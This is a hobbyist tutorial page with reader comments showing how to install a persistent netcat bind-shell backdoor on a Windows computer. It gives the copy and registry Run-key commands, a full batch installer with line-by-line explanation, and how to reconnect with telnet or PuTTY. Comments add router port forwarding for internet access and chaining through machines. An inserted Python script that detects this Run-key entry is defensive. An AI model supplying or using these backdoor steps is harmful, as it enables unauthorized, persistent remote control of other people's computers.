This instructable shows you how to create a backdoor on a computer with netcat! I will show you two ways to do this, with and without my batch file that automates it for you. This instructable assumes that you already have root permissions on the computer, probably obtained with an ophcrack LiveCD. Now, onto the instructable.

Step 1: Download Netcat

I have saved you the trouble of 3 minutes of searching Google and have put nc.exe up on instructables for you to download. Optionally, you can also download nc.bat which is a batch file I have created to automate the process for you. Make sure that if you download nc.bat it is 464 bytes, because I kept on uploading versions and finding out something was wrong with it. If it is not 464 bytes, the program will not correspond with this instructable.

Step 2: With Nc.bat

First, both files must be in the same directory for nc.bat to work properly. I suggest using a flash drive or CD-ROM for this operation. I used a 512 MB Geek Squad flash drive for this, but that is just me. So, copy the files onto your external media device, and bring them to the computer that you have root on. Get on the media device and double-click nc.bat. This will copy the nc.exe file to the system32 folder in the system root (usually C:\Windows or C:\WINNT) and make the necessary changes to the registry. Then write down the IP address. It will be something like '', which is mine. Once this is done, reboot the machine and log in. The anti-virus program may then ask you if you want to allow/disallow the program. Click on 'Allow' or similar. Keep in mind that in this instructable, you can only telnet in from the local network of that computer. Then leave, or log off, or whatever else you want.

Step 3: Without Nc.bat

To do this, you have to have nc.exe on a CD or Flash drive. Go over to the computer, login, and plug in the flash drive or put in your CD.

From here, there are two ways: the polished-up graphical user interface of Windows, or the dirty, old-fashioned way of the command prompt.

The dirty, old-fashioned command prompt way:
Pull up the command prompt by going to Start-->Run and type in:
Navigate your way to the flash or your CD drive. If you do not know which drive is which, right-click on the start button and click explore. Click on all the non-local drives in My Computer until you come to your flash/CD drive. Remember the letter of the drive and go back to the command prompt. Type in the letter of the drive followed by a colon, like this: K:
Then type in one line at a time, followed by hitting the return key:
copy nc.exe %systemroot%\system32\nc.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"

That was pretty much the installation. All you need to know now is the local IP address, which can easily be found by typing in the 'ipconfig' command and looking for something in the table like "". Then reboot the machine and log back in. The anti-virus program might ask you if you want to allow/disallow. Click allow. Then you are free to do what you want with the computer.

The polished-up graphical interfaces of Windows

Right-click on the start button and click explore. Click on all the non-local drives in My Computer until you come to your flash/CD drive. Then right-click nc.exe and copy. Then go to the C drive and click on the Windows or WINNT folder. Then go to the system32 folder and paste nc.exe. Close that out, and go to Start-->Run. Type in regedit. Navigate through the folders to:


Then right click an empty space and go to New-->String Value. Type whatever you want for the name, but for the value, type in:
%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe

That was pretty much the installation. All you need to know now is the local IP address, which can easily be found by typing in the 'ipconfig' command into the command prompt (Start-->Run:cmd.exe) and looking for something in the table like "". Then reboot the machine and log back in. The anti-virus program might ask you if you want to allow/disallow. Click allow. Then you are free to do what you want with the computer.

Step 4: Going Back In

Once you have it installed, and you want to take control of the host, open up the command prompt or PuTTY. I think PuTTY is awesome, so I will let you download it here.

Using PuTTY

Download and open PuTTY.exe. Click on the 'raw' protocol. In the port # text box, type in 4444. In the 'host address' box, type in the IP address you wrote down during installation. Then hit enter. PuTTY should connect to the box and you will get a command prompt.

Using Command Prompt

Open the command prompt and type in 'telnet <enter the IP address you wrote down here> 4444'.
Then hit enter, and you should get a command prompt.

This will let you do nearly anything you want to the computer remotely that you can do with a local account. It really starts to get interesting when you go into one computer, and then go into another computer from that computer, to get a whole chain of computers connected together.

Have (legal) fun!

Step 5: Source Code

Because I have been asked, I will put up the source code (for the batch file) and explain each command and what it does. Be Aware! This is the current version of the batch install program. If yours is different, the code will differ.

@echo off
copy nc.exe %systemroot%\system32\nc.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"
if errorlevel 0 goto ip
:error
echo something unexpected has occurred, and the program needs to exit.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
echo duct tape out.
pause
@echo off - Tells it not to show the commands when executing.
copy nc.exe %systemroot%\system32\nc.exe - Usually copies netcat into C:\WINDOWS\system32. This makes it so that when you go back in, instead of changing directories all the time, you can just type "nc" to open another port.
if errorlevel 0 goto regedit - Error checking. If the copy was successful, it goes on to edit the registry. (Note that "if errorlevel 0" is true whenever the errorlevel is 0 or higher, so in practice this check never falls through to the :error label.)
goto error - If an error occurred, go on to the :error label.
:regedit - A label, specifying that when the program says "goto regedit", to go here.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe" - (supposed to be one line) Adds the registry value that restarts the program when rebooted. /f means overwrite the existing value, /v is the value name, /d is the data. The rest of the flags are input for netcat. -L says to restart it on exit, so you don't have to wait for the computer to restart. -d I forgot. -p 4444 specifies the port number. -t I forgot. -e cmd.exe makes the command prompt start on remote connection.
if errorlevel 0 goto ip - Error checking. If the run went wrong it would skip this line and go down to the :error label.
echo something unexpected has occurred, and the program needs to exit. - Tells the program to print "something unexpected has occurred, and the program needs to exit" on the screen.
goto end - If it went to the error message, something went wrong and the program needs to close anyway.
:ip - Again, a label.
echo write down the IP address from the table - Writes "write down the IP address from the table" to the screen.
ipconfig - This is a command that prints information about your local area network (LAN) settings.
echo end. - Writes "end." to the screen.
echo duct tape out. - Writes "duct tape out." to the screen.
pause - This command pauses the program and waits for the user to press a key. In this program, it waits for input and then exits the program.
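The persistence this batch file sets up (a Run value that launches a listening shell) is also easy to spot from the defender's side. The following Python script is an added example, not part of the original Instructable: it parses the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (a constructed sample is embedded) and flags any value whose command line names netcat, listens (-L/-l) and binds a program with -e, reporting the port and program so the entry can be removed.

```python
"""Added example (not from the original page): flag Run-key values that start a
listening netcat shell, the pattern this page's nc.bat installs."""
import re

# Constructed sample of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
# output; the "nc" line mirrors the command line the batch file writes.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    %systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Indicators taken from the installed command line: a netcat binary name (nc, ncat,
# nc.exe), a listen flag, a program bound to the connection, and the port.
NETCAT_NAME = re.compile(r'(?:^|[\\/ "])nc(?:at)?(?:\.exe)?(?:\s|$|")', re.IGNORECASE)
LISTEN_FLAG = re.compile(r"(?:^|\s)-[lL]\b")
EXEC_FLAG = re.compile(r"(?:^|\s)-e\s+(\S+)")
PORT_FLAG = re.compile(r"(?:^|\s)-p\s+(\d+)")


def parse_run_entries(text):
    """Return (value_name, data) pairs from reg query output.
    Value lines are indented: <name> <REG_type> <data>; the key header is not."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+(REG_\w+)\s+(.*)$", line)
        if m:
            entries.append((m.group(1), m.group(3).strip()))
    return entries


def find_listening_shells(text):
    """Return one dict per Run value that looks like a netcat listener bound to a
    program; an empty list means no such persistence was found."""
    hits = []
    for name, data in parse_run_entries(text):
        if NETCAT_NAME.search(data) and LISTEN_FLAG.search(data):
            exe = EXEC_FLAG.search(data)
            port = PORT_FLAG.search(data)
            hits.append({"value": name,
                         "port": int(port.group(1)) if port else None,
                         "program": exe.group(1) if exe else None})
    return hits


if __name__ == "__main__":
    for hit in find_listening_shells(SAMPLE_RUN_KEY):
        print("suspicious Run value %(value)r listens on port %(port)s and runs %(program)s" % hit)
```

On a real machine, feed the script the saved output of `reg query` and clear a flagged value with `reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v <name> /f` before deleting the binary it points at.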
Nice. I'm gonna go ahead and make an unnc.bat to undo it.
Here's my idea. Go under your home router and enable forwarding of nc.exe on port 4444, then you could access the computer from any internet connection. I've got two computers, but my old laptop doesn't like our network, probably cause it has Windows and Linux on it.... If I look at all the computers on the network, it appears (when it's turned on and hooked up to the router), but not its shared files (they are turned on to share, I'm not an idiot). If I try to see any other computers on the network from this computer, I can't see any. It's kinda like a one-way mirror. It can connect to the internet fine, but not the network. It's set up just like my desktop. Obviously, netcat won't work.
could you explain how to do that?
Before I tell you how to do it, let me go ahead and tell you that if you do it, ANYONE who has internet (millions of people) could log into your computer and control it, so I would REALLY recommend not doing it, even to someone else's computer. With that being said, you need to forward port 4444. Your router acts as a firewall that blocks people from connecting to you that shouldn't be. If you want to communicate with the outside world, you have to tell your router you want to "forward" that port. It will only forward it from the outside world to one IP address. Go check out http://portforward.com/routers.htm to help you do that.
you might want to set up some sort of login to the machine so that anonymous entry is harder. An IP logger would be another good addition.
that is strange. you went to whatismyip.org or something similar to find the IP address first, right?
Yeah. I'm not saying I've actually done it, but it should work.
go to Start and click on run and then on cmd and type in IPconfig/all and then find your IP address. :D
that only shows your network ip. to access it from the 'net you need the other one.
Hi, can anyone tell me how to use netcat on the internet? I tried many times but it didn't work. It works fine on a LAN network, so please help. Thanks
You need to know the external IP address of the target computer, and then set up the router so that it forwards all requests on the port you are using to the target. It should then be accessible through the internet.
I used regedit to put temporary COSMOKEY keys on not as harmful
netcat error
My Anti virus (PC Tools) blocked it.
http://www.securityfocus.com/cgi-bin/index.cgi?c=toolcomments&op=display_comments&ToolID=139&expand_all=true&mode=threaded
go there for netcat :D
nc.exe is a .tmp file, my antivirus got rid of it. and nc.bat is a webpage.
when I click on the files in this Instructable, it tries to download a tmp file.
tell it to save as "all files" then rename it "netcat.exe" or "putty.exe". it did that to me too. are you using IE8?
if you save it as netcat.exe, then nc.bat wont work(if you use it) you should save it as nc.exe
If you got here via google "download netcat", see the comments on "intro". nc.bat creates a backdoor on your computer if you run it.
-d is for stealth, which will make the program run in the background, and -t is for telnet mode; it allows other machines to telnet to it
I'm having trouble. how do you use the window that pops up after you open PuTTY?
and about 15 sec after I open the window it says "connection timed out"
Yea hi if i port forwarded port 4444 to a computer on my network could i remotely access it from a computer off my network?
Yes. But I'd put a password or something on it. You would also need a static ip or a domain name from dyndns.com. What I do sometimes is make my computer into a file server with HFS. Just google it and you will come up with an idea...
yea i have a domain name, i actually have game and web servers and all that stuff running on it. umm with this is there a way i can add files like from remote computer > host ??
Of course! Please tell me more about your set-up.
Rule no. 0: never give away your ip address on a site that teaches you how to hack
This isn't the actual ip address - it is the network ip. It doesn't matter if someone knows this, unless they are on your network.
When I downloaded nc.exe it was a .tmp file, so it didn't work. :o
Hey is my ip address(or at least it seems so)
i-am going to haaaaack youuuuuuu.
ha you're not as smart as you try to be.
a "192.168.x.x" is the ip address *behind* his router. unless you also have the external ip (the one between your isp and you), you can't do a single thing but hack **your own** router
I think he was making a joke...
Even with someone's ip you can't easily or readily hack them, a number of measures are in place "out of the box" on nearly every computer used nowadays. Regardless of whether or not they have a firewall, hacking is not as simple as script kiddies would have you believe.
i'm pretty sure that he was just joking.
dude, that's ur local ip, so nothing will happen to ur machine, k? mine was, too, at one time. a local ip is only for your home (or office) network.
lol ur point?
I have a question. What is a backdoor anyway?
How is that different from a VNC? Try ultavnc single click. E-mail it to your friend. When he runs it dials home. No worry about IP root files ect ect.
can u tell me where to get it please? and when u email it does ur friend have to do anything else besides downloading it? please reply thankyou
google ultavnc and check out their ultravnc single click. Yes , your friend needs to click on it. It is not a trojan and it will warn your friend that he/she is installing a remote viewing application.
It is different because you have to 'get down and dirty' with netcat, but the VNC takes the fun out of it. To get netcat on, you have to do either a sort of heist thing, or social engineering. With VNC, it is just point-and-click. Kinda boring....

More by duct tape: How to make a Jacob's Ladder!, SMTP Fun, Netcat fun!